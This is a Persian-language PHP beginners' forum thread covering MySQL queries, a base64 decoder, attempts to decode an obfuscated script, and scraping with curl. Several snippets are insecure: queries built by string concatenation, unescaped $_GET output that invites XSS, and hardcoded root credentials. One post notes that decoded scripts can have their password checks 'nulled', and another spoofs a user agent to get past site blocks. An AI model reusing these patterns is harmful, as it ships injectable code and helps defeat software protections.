mysql_query('update `mytable` set `my_number_field` = '.$result[0].'where mycondition');
?>
<input type="text" value= "<?php echo $result[0]; ?>" />

مقدار عددی توی جدول نگه داشته میشه که بعد از فراخوانی یک مقدار به اون اضافه میشه و نمایش داده میشه.
نوع فیلد مذکور باید عددی باشه،به قسمت value هم دقت کنید.

noblea&a
12-02-2011, 04:21 PM
پس باید اون اعداد رو در دیتا بیس تعریف کنیم اول؟

alir77
12-02-2011, 09:40 PM
اگر عدد رندوم میخواید که هم با php و هم با javascript به راحتی میتونید تولید کنید.
مثال دوستمون درباره گرفتن آخرین شماره از رکوردهای یک جدول دیتابیس هست.

Sil3nt Di3
12-02-2011, 09:43 PM
سلام دوست عزیز شما از هرچی استفاده کنی بلاخره دیکد میشه... مثلا یونکیوب نسخه 6.5 خیلی عالی بود اما خوب براحتی دیکد شد درحالی که بهترین بود... الان هم نسخه 7 اومده که هنوز دیکد نشده و عالی هست/...

مرتب پیگیر باش و آپیت کن تا مشکلی برات پیش نیاد...

Sil3nt Di3
12-02-2011, 09:52 PM
سلام دوست عزیز برای اینکه بخواید یک عدد تصادفی رو در درون یک فیلد قرار بدید اول باید کد تصادفی رو با استفاده از تابع rand ایجاد کنی سپس اون رو در فیلد بزاری


<?php
$rand = rand();
?>
<input type="text" value= "<?php echo $rand ?>" />

موفق باشید...

sajjad13and11
12-04-2011, 12:54 PM
هيچ راهي نيست ديكد نشه؟
يه كدي ميشه بدين پسورد مخصوص براي استفاده ازش بزارم

Goback
12-04-2011, 01:04 PM
هيچ راهي نيست ديكد نشه؟
يه كدي ميشه بدين پسورد مخصوص براي استفاده ازش بزارم
برای سوال اولتون که وحید جواب داد،برای سوال دومتون هم اگر کد دیکد بشه که سورس قابل رویت بشه دیگه میشه به راحتی سیستم چک پسورد رو برداشت و به اصطلاح نال کردش،پس بهتره همون توصیه به روز بودن با تکنولوژی های کد کردن رو پی بگیرید.

LORD SaeeD
12-04-2011, 02:56 PM
کسی نبود بعد 2 ماه کمک کنه؟

joyeroshan
12-04-2011, 03:00 PM
دوست عزیز این با base64 اینکد شده می تونی به صورت آنلاین بگردی دیکدرهاش هست.
اینم دیکدرش
اینقدرم عجله نکن!

دوستان گرامی انواع دیکدرهای base64 آنلاین وجود داره تو نت اما خب بعضی ها کار نمیکنن در این قسمت یه اسکریپت دیکدر میزارم فقط لطف کنید ذخیرش کنید

<html><head>
<meta [Only registered and activated users can see links]"content-type" content="text/html; charset=ISO-8859-1">

<title>base64 Encoding/Decoding</title>
<script type="text/javascript"><!--
var keyStr = "ABCDEFGHIJKLMNOP" +
"QRSTUVWXYZabcdef" +
"ghijklmnopqrstuv" +
"wxyz0123456789+/" +
"=";

function encode64(input) {
input = escape(input);
var output = "";
var chr1, chr2, chr3 = "";
var enc1, enc2, enc3, enc4 = "";
var i = 0;

do {
chr1 = input.charCodeAt(i++);
chr2 = input.charCodeAt(i++);
chr3 = input.charCodeAt(i++);

enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;

if (isNaN(chr2)) {
enc3 = enc4 = 64;
} else if (isNaN(chr3)) {
enc4 = 64;
}

output = output +
keyStr.charAt(enc1) +
keyStr.charAt(enc2) +
keyStr.charAt(enc3) +
keyStr.charAt(enc4);
chr1 = chr2 = chr3 = "";
enc1 = enc2 = enc3 = enc4 = "";
} while (i < input.length);

return output;
}

function decode64(input) {
var output = "";
var chr1, chr2, chr3 = "";
var enc1, enc2, enc3, enc4 = "";
var i = 0;

// remove all characters that are not A-Z, a-z, 0-9, +, /, or =
var base64test = /[^A-Za-z0-9\+\/\=]/g;
if (base64test.exec(input)) {
alert("There were invalid base64 characters in the input text.\n" +
"Valid base64 characters are A-Z, a-z, 0-9, '+', '/', and '='\n" +
"Expect errors in decoding.");
}
input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");

do {
enc1 = keyStr.indexOf(input.charAt(i++));
enc2 = keyStr.indexOf(input.charAt(i++));
enc3 = keyStr.indexOf(input.charAt(i++));
enc4 = keyStr.indexOf(input.charAt(i++));

chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;

output = output + String.fromCharCode(chr1);

if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}

chr1 = chr2 = chr3 = "";
enc1 = enc2 = enc3 = enc4 = "";

} while (i < input.length);

return unescape(output);
}

//-->
</script>

</head><body><center>
<form name="base64Form">
Type in the message you want to encode in base64, or paste<br>
base64 encoded text into the text field, select Encode or Decode, <br>
and click the button!<br>

<textarea name="theText" cols="60" rows="20"></textarea><br>

<input name="encode" value="Encode to base64" onclick="document.base64Form.theText.value=encode64(documen t.base64Form.theText.value);" type="button">
<input name="decode" value="Decode from base64" onclick="document.base64Form.theText.value=decode64(documen t.base64Form.theText.value);" type="button">
</form></center>
</body></html>

LORD SaeeD
12-05-2011, 12:35 AM
دوست عزیز این با base64 اینکد شده می تونی به صورت آنلاین بگردی دیکدرهاش هست.
اینم دیکدرش
اینقدرم عجله نکن!

دوستان گرامی انواع دیکدرهای base64 آنلاین وجود داره تو نت اما خب بعضی ها کار نمیکنن در این قسمت یه اسکریپت دیکدر میزارم فقط لطف کنید ذخیرش کنید

<html><head>
<meta [Only registered and activated users can see links]"content-type" content="text/html; charset=ISO-8859-1">

<title>base64 Encoding/Decoding</title>
<script type="text/javascript"><!--
var keyStr = "ABCDEFGHIJKLMNOP" +
"QRSTUVWXYZabcdef" +
"ghijklmnopqrstuv" +
"wxyz0123456789+/" +
"=";

function encode64(input) {
input = escape(input);
var output = "";
var chr1, chr2, chr3 = "";
var enc1, enc2, enc3, enc4 = "";
var i = 0;

do {
chr1 = input.charCodeAt(i++);
chr2 = input.charCodeAt(i++);
chr3 = input.charCodeAt(i++);

enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;

if (isNaN(chr2)) {
enc3 = enc4 = 64;
} else if (isNaN(chr3)) {
enc4 = 64;
}

output = output +
keyStr.charAt(enc1) +
keyStr.charAt(enc2) +
keyStr.charAt(enc3) +
keyStr.charAt(enc4);
chr1 = chr2 = chr3 = "";
enc1 = enc2 = enc3 = enc4 = "";
} while (i < input.length);

return output;
}

function decode64(input) {
var output = "";
var chr1, chr2, chr3 = "";
var enc1, enc2, enc3, enc4 = "";
var i = 0;

// remove all characters that are not A-Z, a-z, 0-9, +, /, or =
var base64test = /[^A-Za-z0-9\+\/\=]/g;
if (base64test.exec(input)) {
alert("There were invalid base64 characters in the input text.\n" +
"Valid base64 characters are A-Z, a-z, 0-9, '+', '/', and '='\n" +
"Expect errors in decoding.");
}
input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");

do {
enc1 = keyStr.indexOf(input.charAt(i++));
enc2 = keyStr.indexOf(input.charAt(i++));
enc3 = keyStr.indexOf(input.charAt(i++));
enc4 = keyStr.indexOf(input.charAt(i++));

chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;

output = output + String.fromCharCode(chr1);

if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}

chr1 = chr2 = chr3 = "";
enc1 = enc2 = enc3 = enc4 = "";

} while (i < input.length);

return unescape(output);
}

//-->
</script>

</head><body><center>
<form name="base64Form">
Type in the message you want to encode in base64, or paste<br>
base64 encoded text into the text field, select Encode or Decode, <br>
and click the button!<br>

<textarea name="theText" cols="60" rows="20"></textarea><br>

<input name="encode" value="Encode to base64" onclick="document.base64Form.theText.value=encode64(documen t.base64Form.theText.value);" type="button">
<input name="decode" value="Decode from base64" onclick="document.base64Form.theText.value=decode64(documen t.base64Form.theText.value);" type="button">
</form></center>
</body></html>

ممنون joyeroshan جان من خودم گشتم ولی مثل اینکه چند بار کد شده.بخاطر همین اینجا پیام دادم.
کدی که شما هم دادید تست کردم کار نکرد.
در ضمن BASE64 که کاراکتر / نداره! داخل کد ها / هست که بدون اون هم زدم بازم کدهای عجیب غریب تولید میکنه!:92:

joyeroshan
12-05-2011, 02:16 AM
ممنون joyeroshan جان من خودم گشتم ولی مثل اینکه چند بار کد شده.بخاطر همین اینجا پیام دادم.
کدی که شما هم دادید تست کردم کار نکرد.
در ضمن BASE64 که کاراکتر / نداره! داخل کد ها / هست که بدون اون هم زدم بازم کدهای عجیب غریب تولید میکنه!:92:

دقیقا حق با شماست من هم چنین مشکلی برخوردم و به بهترین کسای که php کار می کردن نشون دادم نمی خوام نا امیدت کنم اما خیلی سخته چون این کد چند بار اینکد شده است و برای دیکد کردن نیاز به مهندسی معکوس است اما خوب من ندیدم کسی بتونه اینو دیکد کنه .از همینجام می گن اگه کسی بلده به این دوستمون کمک کنه

3H34N
12-05-2011, 01:18 PM
این base64 نیست دیکدرشو قبلا نوشم اما پرایوت فعلا
ابنم فایلت دیکد شد

[Only registered and activated users can see links]

3H34N
12-05-2011, 01:30 PM
obfuscat کن بعد با fopo کد کن ;)

djsaeedkhan
12-05-2011, 03:10 PM
یه روش ساده قرار دادن مقدار در ادامه یو آر ال و استفاده از اونه
حتی میشه خود مقدار رو بعد از کد کردن فرستاد.
مثلا


<a href=login.php?id=ali>LOGIN</a>


login.php
نام کاربری :<input type=text value=<?php echo $_GET["id"];?>

LORD SaeeD
12-05-2011, 03:15 PM
این base64 نیست دیکدرشو قبلا نوشم اما پرایوت فعلا
ابنم فایلت دیکد شد

[Only registered and activated users can see links]
خیلی ممنون.
هرچند کلمات فارسی همگی خراب شدن ولی همین که دیکد شده خودش خیلیه.خیلی ممنون.:35:

adc
12-05-2011, 03:50 PM
سلام منیک کدی می خواستم که یک عدد را در یک تیبل از دیتابیس با ۶۰۰ هزار row جستوجو کند خیلی فوری هست لطفا سریع بدید

Goback
12-05-2011, 04:36 PM
سلام منیک کدی می خواستم که یک عدد را در یک تیبل از دیتابیس با ۶۰۰ هزار row جستوجو کند خیلی فوری هست لطفا سریع بدید
هو،
سلام علیکم،

خب باید به زبان sql آشنا باشید،اگر باشید که ساده ست:

$sql="SELECT `myField` FROM `myTable` WHERE condition";
بعدش باید با توابع کار با دیتابیس در PHP آشنا باشید،که این کوئری رو به دیتابیس ارجاع بدید و جواب بگیرید.مثلا اگر دیتابیس MySQL باشه:

$res=mysql_query($sql);

و بعد باید با نتیجه ی برگشتی از دیتابیس دست و پنجه نرم کرد توسط توابع مربوطه:

mysql_fetch_array
mysql_fetch_assoc
mysql_num_rows
...

یا حق ج

adc
12-05-2011, 05:13 PM
می شه یکم کامل تر توضیح بدید با یک کد اماده

Goback
12-05-2011, 06:16 PM
می شه یکم کامل تر توضیح بدید با یک کد اماده

باشه،سعی میکنم در چند قسمت توضیح بدم.

نوع دیتابیس من: MySQL
اسم دیتابیس من: bank
اسم جدول من: book
محتویات جدول من: شماره کتاب(id) , اسم کتاب(name) , نویسنده(author)
آدرس هاست MySQL من: 127.0.0.1
نام کاربری مربوط به ارتباط با دیتابیس من: root
پسورد نام کاربری بالا : 123
------------
صورت مسئله:میخواهم کتاب شماره 110 را پیدا کرده و اسم کتاب و نویسنده ی آن را نمایش دهم.

اول یه دیتابیس وصل میشم:

$conn = mysql_connect("127.0.0.1","root","123");
متغیر $conn برای نگهداری نتیجه ی این اتصال استفاده میشه

بررسی میکنیم که به دیتابیس وصل شده باشم:

if(!$conn){die ("Error in DB connection"); }

خب اینجا اگر مشکلی در اتصال باشد با خطای:Error in DB connection مواجه میشیم و اجرای برنامه متوقف میشه به خاطر استفاده از تابع die،در غیر این صورت برنامه بدون مشکل ادامه پیدا میکنه.

Goback
12-05-2011, 06:27 PM
بخش بعدی.

بعد از این موارد،باید دیتابیسی رو که قصد کار با اون رو دارم،انتخاب کنم،این کار بدینصورت انجام میشه:

mysql_select_db("bank");
اسم دیتابیس ما در اینجا bank بوده.
این تابع پارامتر دوم هم میگیره ولی اختیاریه،ولی جهت تکمیل مطلب میگم:

mysql_select_db('bank',$conn);
اینجا پارامتر دوم یعنی شناسه ی اتصال ما که در قسمت قبل با تابع Mysql_connect ایجاد کردیم رو تنظیم کردیم،گرچه این پارامتر اختیاری هستش،ولی در جاهایی که چند اتصال به هاستهای مختلف صورت میگیره باید مشخص شه.

خب مرحله بعدی کار با زبان SQL هست،این زبان برای صحبت کردن با دیتابیس استفاده میشه و برای دیتابیسهای مختلف کمی فرق میکنه،گرچه اصول کار یکیه،خب اینجا بانکمون MySQL هست و باید با زبان sql مربوط به این بانک صحبت کنیم.

سوال ما از دیتابیس: آیا کتابی با شماره 110 در جدول book وجود دارد،اگر وجود دارد اطلاعات آن را به من بده.

این توی زبان sql به این صورت نوشته میشه:

SELECT * FROM book WHERE id = '110'
اگر زبانتون خوب باشه ،مشخصه که به زبان انگلیسی بسیار شبیه هست و این کار رو راحت میکنه:انتخاب کن هرچیزی در مورد جدول book جایی که id آن برابر با 110 باشه.

تا اینجا رو داشته باشین،مابقی رو آخر شب مینویسم براتون.

u0il
12-05-2011, 07:50 PM
سلام من الان یک اسکرپت دارم که درون آن کلمات به این شکل هستند ظٹظƒطھظ…ظ„ ط¨ط¹ ولی به درستی اجرا می شوند ولی بدی این حالت این هست که در ترجمهمشکل به وجود می یاید و نمی دونی هر چیز ماله کجا هست حالا خواهش می کنم هر کی می تونه من را کمک کنه که این کلمات را از این حالت در بیارم:98::88:

================
روش کلی :
tools menu->options->content->font&colorl->advanced->characterEncoding->Unicode(UTF-8)
لطفا برای درک موضوع این عکس رو ببین:
[Only registered and activated users can see links]
============
روش دوم:
مختص فایل های PHP :
به ابتدای فایل PHP ی خودت کد زیر رو اضافه کن :
header('Content-type: text/html; charset=utf-8');
==================
هر سوالی از برنامه نویسی داشتی توی انجمن بذار ، همچنین لینک جایی که سوالتو پرسیدی برام بذار،انشاءالله پاسخ خواهم داد.
----
be successfull

xx220
12-05-2011, 08:31 PM
داداش لینکی که دادی تو عکس ویروسی هست ؟؟؟؟؟؟آنتی ویروسم نمیزاره باز کنم ببینم چه جوریه.

Goback
12-05-2011, 10:36 PM
حالا که درخواست ما مشخص شده است،باید آن را به دیتابیس MySQL بفرستیم و جوابمان را بگیریم،تابع mysql_query این کار را برایمان انجام میدهد:

$res=mysql_query("SELECT * FROM book WHERE id = '110'" );

خب،با اجرای این درخواست نتیجه در متغیر

$res
ذخیره میشود.
تا اینجای کار اگر همه چیز درست پیش رفته باشد،نتیجه ی برگشتی مورد نیاز در دسترس بوده و فی الحال بایستی تصمیم بگیریم که از این نتیجه باید چگونه استفاده کنیم،توابع زیادی برای استفاده از این نتایج به اقتضای خود به کار می روند،من در اینجا فقط یک تابع را بررسی میکنم.

تابع Mysql_fetch_assoc
این تابع نتیجه برگشتی از دیتابیس را گرفته و در هر بار فراخوانی یک سطر از اطلاعات را به ما می دهد،البته به صورت آرایه،نتیجه رو به تابع میدیم:

$row = mysql_fetch_assoc($res);
باید دقت کرد که چون درخواست ما فقط ی یک سطر نتیجه را بر میگرداند،پس این تابع با یک بار اجرا نیاز ما را بر طرف می سازد،با کدهای زیر میتوانیم اسم و نویسنده ی کتابی که شماره آن 110 هست را نمایش بدهیم:

echo $row['name'];
echo "<br />";
echo $row['author'];

بعد از این مقدمه در بخش بعدی به مسئله جستجوی در دیتابیس پرداخته خواهد شد.

semac
12-05-2011, 11:19 PM
سلام
خسته نباشید
من چطور میتونم با php محتویات یه سایت دیگه رو جستجو کنم یا بهتر بگم: چطور میشه فهمید که یه سایت یا وبلاگ لینکی به سایت ما داده؟ کلاً میخوام ببینم چطور میشه کدهای یه سایت دیگه رو پردازش کرد و مثلاً تگ <body> یا تگ <title> یک صفحه رو استخراج کرد؟

Goback
12-05-2011, 11:35 PM
سلام
خسته نباشید
من چطور میتونم با php محتویات یه سایت دیگه رو جستجو کنم یا بهتر بگم: چطور میشه فهمید که یه سایت یا وبلاگ لینکی به سایت ما داده؟ کلاً میخوام ببینم چطور میشه کدهای یه سایت دیگه رو پردازش کرد و مثلاً تگ <body> یا تگ <title> یک صفحه رو استخراج کرد؟

هو،
سلام علیکم،
PHP معمولا از تابعی مثل [Only registered and activated users can see links] استفاده می کنه برای این کار.
ولی برای راحتی کار و دقیقا این چیزی که شما میخواین به لینک زیر مراجعه کنید،محتویات رو به سبک DOM و مثل توابع جی کوئری میریزه جلوتون و شما به راحتی آب خوردن میتونید روی این اطلاعات برگشتی مانور بدید:


[Only registered and activated users can see links]

به زبان ساده ی خودشون:

A HTML DOM parser written in PHP5+ let you manipulate HTML in a very easy way!
Require PHP 5+.
Supports invalid HTML.
Find tags on an HTML page with selectors just like jQuery.
Extract contents from HTML in a single line.


یا حق ج

Goback
12-06-2011, 03:44 PM
بخش بعدی.

تا اینجای کار ما یاد گرفتیم که چگونه میشه یک درخواست خاص رو به دیتابیس بفرستیم و جواب بگیریم و چگونه از جواب برگشتی استفاده کنیم،این کل کد مثال قبلی ما:


<?php
/***************
نوع دیتابیس من:
MySQL
اسم دیتابیس من:
bank
اسم جدول من:
book
محتویات جدول من:
شماره کتاب(id) , اسم کتاب(name) , نویسنده(author)
آدرس هاست MySQL من:
127.0.0.1
نام کاربری مربوط به ارتباط با دیتابیس من:
root
پسورد نام کاربری بالا :
123
****************/
$conn = mysql_connect("127.0.0.1","root","123");
if(!$conn){die ("Error in DB connection"); }
mysql_select_db("bank");
$res=mysql_query("SELECT * FROM book WHERE id = '110'" );
$row = mysql_fetch_assoc($res);
echo $row['name'];
echo "<br />";
echo $row['author'];
?>


در صورت مسئله ی فعلی ما قصد بر این است که موردی را در دیتابیس جستجو کنیم و نتیجه را نمایش بدهیم،پس باید دید اگر کاربر به عنوان مثال کلمه "شهید" را در کادر جستجوی نام کتاب وارد و بر روی 'جستجو' کلیک کند چه اتفاقی خواهد افتاد.
در ادامه پشت پرده این اتفاق رو با کد بررسی میکنیم،دو تفاوت در این مسئله نسبت به مسئله ی قبلی وجود داره،اولین اینکه ما نمی دانیم کاربر دقیقا چه وارد میکند،پس جستجوی ما باید نسبی باشد،و دوم اینکه نتایج برگشتی بیشتر از یک سطر می باشد ،پس بایستی از حلقه استفاده کرد.
درخواست خود را با زبان SQL برای کلمه ی "شهید" بدینگونه می نویسیم:


SELECT * FROM book WHERE name like '%شهید%'

درخواست خودمون رو به دیتابیس میفرستیم:

$res=mysql_query("SELECT * FROM book WHERE name like '%شهید%'" );

تفاوت درخواست ما در کلمه ی کلیدی LIKE هست،و در مثال ما تمامی کتبی که در اسامی آن از شهید استفاده شده باشد در نتایج برگشتی ما وجود خواهد داشت.
تفاوت دوم هم در کد زیر نمایان میشه:

while($row = mysql_fetch_assoc($res)){
echo $row['name'];
echo '<br />';
echo $row['author'];
echo '<hr />';
}

این حلقه در هر بار اجرا یک سطر از نتیجه را نمایش میدهد،در نتیجه تمامی نتایج برگشتی چاپ خواهند شد.
پس کل کد سوال دوم ما بدین صورت میشه:

<?php
/***************
نوع دیتابیس من:
MySQL
اسم دیتابیس من:
bank
اسم جدول من:
book
محتویات جدول من:
شماره کتاب(id) , اسم کتاب(name) , نویسنده(author)
آدرس هاست MySQL من:
127.0.0.1
نام کاربری مربوط به ارتباط با دیتابیس من:
root
پسورد نام کاربری بالا :
123
****************/
$conn = mysql_connect("127.0.0.1","root","123");
if(!$conn){die ("Error in DB connection"); }
mysql_select_db("bank");
$res=mysql_query("SELECT * FROM book WHERE name like '%شهید%'" );
while($row = mysql_fetch_assoc($res)){
echo $row['name'];
echo '<br />';
echo $row['author'];
echo '<hr />';
}

?>

حالا اینکه این کلمه ی 'شهید' توسط کاربر ارسال بشه باید از فرم استفاده بشه،در صورت نیاز جستجو کنید،و در صورت نیافتن پاسخ همینجا بگید تا جوابگو باشن/باشیم.

فکر کنم توضیح کافی بوده باشه.
موفق باشید.

adc
12-06-2011, 05:18 PM
این خیلی طول می کشه.
بعدش هم از سی پی یو و رم خیلی اشغال می شه .

یعنی ۱-۲ دقیقه طول می کشه تازه به ۴۰۰۰۰ هزار که می رسه دیگه ادامه نمی ده

Goback
12-06-2011, 05:56 PM
این خیلی طول می کشه.
بعدش هم از سی پی یو و رم خیلی اشغال می شه .

یعنی ۱-۲ دقیقه طول می کشه تازه به ۴۰۰۰۰ هزار که می رسه دیگه ادامه نمی ده

احتمالا شما بر بروی یه فیلد متنی بزرگ این جستجو رو انجام میدید،در این صورت استفاده از دستوراتی که در آن از LIKE استفاده میشه،علاوه بر اینکه منابع سرور رو اذیت میکنه ،همچنین سرعت کمتری رو هم داره.
در این صورت پیشنهاد میکنم از روش جستجوی FULL TEXT استفاده کنید،البته راههای دیگه ای هم هست.
این لینک به شما کمک میکنه:

[Only registered and activated users can see links]

semac
12-06-2011, 08:17 PM
سلام مجدد
ممنون از پاسخ خوبتون

یه مشکل >>اون تابع پی اچ پی (file_get_contents) روی بعضی از سایتا و وبلاگا که ادرساشون با htaccess دستکاری میشه، اجرا نمیشه. مثلاً این آدرس رو نمیشه کاریش کرد:
[Only registered and activated users can see links]

ولی آدرسای بلاگفا که پسوند داره میشه، مثلاً: [Only registered and activated users can see links] تابع php توی این درست کار میکنه
راهی نیست برای بلاگ اسکای هم همچین کاری کرد؟

Goback
12-06-2011, 10:34 PM
سلام مجدد
ممنون از پاسخ خوبتون

یه مشکل >>اون تابع پی اچ پی (file_get_contents) روی بعضی از سایتا و وبلاگا که ادرساشون با htaccess دستکاری میشه، اجرا نمیشه. مثلاً این آدرس رو نمیشه کاریش کرد:
[Only registered and activated users can see links]

ولی آدرسای بلاگفا که پسوند داره میشه، مثلاً: [Only registered and activated users can see links] تابع php توی این درست کار میکنه
راهی نیست برای بلاگ اسکای هم همچین کاری کرد؟

بله درسته،بعضی سایتها با چک کردن هدر ارسالی از برخی عملیات جلوگیری میکنند،ولی همیشه راهی هست،اول تابع زیر رو از این آدرس ([Only registered and activated users can see links]) گرفتم:

<?php
function get_content($url)
{
$ch = curl_init();
$useragent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1";
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_HEADER, 0);

ob_start();

curl_exec ($ch);
curl_close ($ch);
$string = ob_get_contents();

ob_end_clean();

return $string;

}

echo get_content("[Only registered and activated users can see links]");

?>
و بعد User agent رو ست کردم،با اینکار در حقیقت مرورگر رو شبیه سازی میکنیم و سایت بدون هیچ مقاومتی محتویات خودشو تقدیم میکنه،یادتون باشه CURL روی PHPتون فعال باشه.
موفق باشید.

noblea&a
12-07-2011, 10:29 PM
سلام دوستان خسته نباشد
من 1 کدی پیدا کردم که بتونم بعد از انتخاب استان ها شهر هارو انتخاب کنم(2 تا منو درست کردم یکی شهر یکی استان و استان هارو انتخاب میکنم شهر ها میاد)
ولی 1 مشکلی دارم
نمیتونم این فیلد هارو تو دیتا بیس بنویسم
من از dreamwaver استفاده میکنم
و mysql
میشه راهنمایی کنید چطوی این رو به دیتا بیس بنویسم؟


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "[Only registered and activated users can see links]">

<html xmlns="[Only registered and activated users can see links]">


<head runat="server">
<title>Untitled Page</title>

**********
function Func(Shahrestanha) {
var _Shahrestan = document.getElementById("Shahrestan");
_Shahrestan.options.length = 0;
if(Shahrestanha != "") {
var arr = Shahrestanha.split(",");
for(i = 0; i < arr.length; i++) {
if(arr[i] != "") {
_Shahrestan.options[_Shahrestan.options.length]=new Option(arr[i],arr[i]);
}
}
}
}



</script>

</head>
<body>
<form id="form1" name="FRM" runat="server" action="" method="post" >


<div dir="rtl" style="text-align: center" >
<p>استان :&nbsp; </p>
<p>

<select id="Ostan" runat="server" onchange="Func(this.value)"<?php $ali=Ostan; echo ali;?>>
<option value=""></option>
<option value=" ,آذرشهر ,اسکو ,اهر ,بستان*آباد ,بناب ,تبریز ,جلفا ,چاراویماق ,سراب ,شبستر ,عجب*شیر ,کلیبر ,مراغه ,مرند ,ملکان ,میانه ,ورزقان ,هریس ,هشترود">آذربایجان شرقی</option>
<option value=" ,ارومیه ,اشنویه ,بوکان ,پیرانشهر ,تکاب ,چالدران ,خوی ,سردشت ,سلماس ,شاهین*دژ ,ماکو ,مهاباد ,میاندوآب ,نقده">آذربایجان غربی</option>
<option value=" ,اردبیل ,بیله*سوار ,پارس*آباد ,خلخال ,کوثر ,گِرمی ,مِشگین*شهر ,نَمین ,نیر">اردبیل</option>
<option value=" ,آران و بیدگل ,اردستان ,اصفهان ,برخوار و میمه ,تیران و کرون ,چادگان ,خمینی*شهر ,خوانسار ,سمیرم ,شهرضا ,سمیرم سفلی ,فریدن ,فریدون*شهر ,فلاورجان ,کاشان ,گلپایگان ,لنجان ,مبارکه ,نائین ,نجف*آباد ,نطنز">اصفهان</option>
<option value=" ,آبدانان ,ایلام ,ایوان ,دره*شهر ,دهلران ,شیروان و چرداول ,مهران">ایلام</option>
<option value=" ,بوشهر ,تنگستان ,جم ,دشتستان ,دشتی,دیر ,دیلم ,کنگان ,گناوه">بوشهر</option>
<option value=" ,اسلام*شهر ,پاکدشت ,تهران ,دماوند ,رباط*کریم ,ری ,ساوجبلاغ ,شمیرانات ,شهریار ,فیروزکوه ,کرج ,نظرآباد ,ورامین">تهران</option>
<option value=" ,اردل ,بروجن ,شهرکرد ,فارسان ,کوهرنگ ,لردگان">چهارمحال و بختیاری</option>
<option value=" ,بیرجند ,درمیان ,سرایان ,سربیشه ,فردوس ,قائنات,نهبندان">خراسان جنوبی</option>
<option value=" ,بردسکن ,تایباد ,تربت جام ,تربت حیدریه ,چناران ,خلیل*آباد ,خواف ,درگز ,رشتخوار ,سبزوار ,سرخس ,فریمان ,قوچان ,کاشمر ,کلات ,گناباد ,مشهد ,مه ولات ,نیشابور">خراسان رضوی</option>
<option value=" ,اسفراین ,بجنورد ,جاجرم ,شیروان ,فاروج ,مانه و سملقان">خراسان شمالی</option>
<option value=" ,آبادان ,امیدیه ,اندیمشک ,اهواز ,ایذه ,باغ*ملک ,بندر ماهشهر ,بهبهان ,خرمشهر ,دزفول ,دشت آزادگان ,رامشیر ,رامهرمز ,شادگان ,شوش ,شوشتر ,گتوند ,لالی ,مسجد سلیمان,هندیجان ">خوزستان</option>
<option value=" ,ابهر ,ایجرود ,خدابنده ,خرمدره ,زنجان ,طارم ,ماه*نشان">زنجان</option>
<option value=" ,دامغان ,سمنان ,شاهرود ,گرمسار ,مهدی*شهر">سمنان</option>
<option value=" ,ایرانشهر ,چابهار ,خاش ,دلگان ,زابل ,زاهدان ,زهک ,سراوان ,سرباز ,کنارک ,نیک*شهر">سیستان و بلوچستان</option>
<option value=" ,آباده ,ارسنجان ,استهبان ,اقلید ,بوانات ,پاسارگاد ,جهرم ,خرم*بید ,خنج ,داراب ,زرین*دشت ,سپیدان ,شیراز ,فراشبند ,فسا ,فیروزآباد ,قیر و کارزین ,کازرون ,لارستان ,لامِرد ,مرودشت ,ممسنی ,مهر ,نی*ریز">فارس</option>
<option value=" ,آبیک ,البرز ,بوئین*زهرا ,تاکستان ,قزوین">قزوین</option>
<option value=" ,قم">قم</option>
<option value=" ,بانه ,بیجار ,دیواندره ,سروآباد ,سقز ,سنندج ,قروه ,کامیاران ,مریوان">کردستان</option>
<option value=" ,بافت ,بردسیر ,بم ,جیرفت ,راور ,رفسنجان ,رودبار جنوب ,زرند ,سیرجان ,شهر بابک ,عنبرآباد ,قلعه گنج ,کرمان ,کوهبنان ,کهنوج ,منوجان">کرمان</option>
<option value=" ,اسلام*آباد غرب ,پاوه ,ثلاث باباجانی ,جوانرود ,دالاهو ,روانسر ,سرپل ذهاب ,سنقر ,صحنه ,قصر شیرین ,کرمانشاه ,کنگاور ,گیلان غرب ,هرسین">کرمانشاه</option>
<option value=" ,بویراحمد ,بهمئی ,دنا ,کهگیلویه ,گچساران">کهگیلویه و بویراحمد</option>
<option value=" ,آزادشهر ,آق*قلا ,بندر گز ,ترکمن ,رامیان ,علی*آباد ,کردکوی ,کلاله ,گرگان ,گنبد کاووس ,مراوه*تپه ,مینودشت">گلستان</option>
<option value=" ,آستارا ,آستانه اشرفیه ,اَملَش ,بندر انزلی ,رشت ,رضوانشهر ,رودبار ,رودسر ,سیاهکل ,شَفت ,صومعه*سرا ,طوالش ,فومَن ,لاهیجان ,لنگرود ,ماسال">گیلان</option>
<option value=" ,ازنا ,الیگودرز ,بروجرد ,پل*دختر ,خرم*آباد ,دورود ,دلفان ,سلسله ,کوهدشت">لرستان</option>
<option value=" ,آمل ,بابل ,بابلسر ,بهشهر ,تنکابن ,جویبار ,چالوس ,رامسر ,ساری ,سوادکوه ,قائم*شهر ,گلوگاه ,محمودآباد ,نکا ,نور ,نوشهر">مازندران</option>
<option value=" ,آشتیان ,اراک ,تفرش ,خمین ,دلیجان ,زرندیه ,ساوه ,شازند ,کمیجان ,محلات">مرکزی</option>
<option value=" ,ابوموسی ,بستک ,بندر عباس ,بندر لنگه ,جاسک ,حاجی*آباد ,شهرستان خمیر ,رودان ,قشم ,گاوبندی ,میناب">هرمزگان</option>
<option value=" ,اسدآباد ,بهار ,تویسرکان ,رزن ,کبودرآهنگ ,ملایر ,نهاوند ,همدان">همدان</option>
<option value=" ,ابرکوه ,اردکان ,بافق ,تفت ,خاتم ,صدوق ,طبس ,مهریز ,مِیبُد ,یزد">یزد</option>
